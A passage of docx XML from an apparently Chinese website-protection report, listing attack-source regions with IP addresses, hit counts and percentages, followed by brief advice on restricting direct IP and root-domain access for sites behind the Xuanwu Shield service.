            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.63%</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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>贵州</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>221.13.12.119(2次)</w:t>
              <w:br/>
              <w:t>221.13.12.23(1次)</w:t>
              <w:br/>
              <w:t>221.13.12.89(1次)</w:t>
              <w:br/>
              <w:t>221.13.12.190(1次)</w:t>
              <w:br/>
              <w:t>221.13.12.223(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.63%</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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>湖南</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>42.48.78.185(1次)</w:t>
              <w:br/>
              <w:t>42.48.79.174(1次)</w:t>
              <w:br/>
              <w:t>42.48.79.182(1次)</w:t>
              <w:br/>
              <w:t>110.53.240.112(1次)</w:t>
              <w:br/>
              <w:t>110.53.241.37(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.53%</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34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>台湾</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>61.221.4.127(3次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.32%</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35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>德国</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>130.61.213.74(2次)</w:t>
              <w:br/>
              <w:t>54.37.75.187(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.32%</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36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>吉林</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>124.235.138.196(1次)</w:t>
              <w:br/>
              <w:t>222.161.43.175(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.21%</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37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>辽宁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>123.191.131.14(1次)</w:t>
              <w:br/>
              <w:t>123.245.25.120(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.21%</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38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>黑龙江</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.190.237.92(1次)</w:t>
              <w:br/>
              <w:t>1.190.237.252(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.21%</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39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>乌克兰</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>193.107.169.215(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>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0.11%</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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>挪威</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>90.149.214.191(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>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0.11%</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41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>日本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>13.230.148.121(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>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0.11%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>英国</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>159.65.31.12(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>0.11%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidP="00EA311D" w:rsidR="005379B7" w:rsidRDefault="005379B7" w:rsidRPr="00D96623">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96623">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00125681" w:rsidR="005379B7" w:rsidRDefault="005379B7" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:hanging="357" w:left="357"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc518464544"/>
      <w:bookmarkStart w:id="22" w:name="_Toc531180269"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全建议</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>须知</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="007E34ED" w:rsidRDefault="007E34ED" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全建议：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="007E34ED" w:rsidRDefault="00B64B4D" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="23" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidR="007E34ED" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>已接入</w:t>
      </w:r>
      <w:r w:rsidR="00DD47B1" w:rsidRPr="00DD47B1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>玄武盾</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E34ED" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的网站域名禁用IP方式进行访问，或者做好访问控制，只允许</w:t>
      </w:r>
      <w:r w:rsidR="00DD47B1" w:rsidRPr="00DD47B1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>玄武盾</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E34ED" w:rsidRPr="00DD47B1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="007E34ED" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P与源站进行请求响应；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="007E34ED" w:rsidRDefault="00B64B4D" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E34ED" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如带www的子域名网站接入</w:t>
      </w:r>
      <w:r w:rsidR="00DD47B1" w:rsidRPr="00DD47B1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>玄武盾</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E34ED" w:rsidRPr="00DD47B1">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007E34ED" w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>不带www的根域名网站禁用访问；</w:t>
      </w:r>
    </w:p>
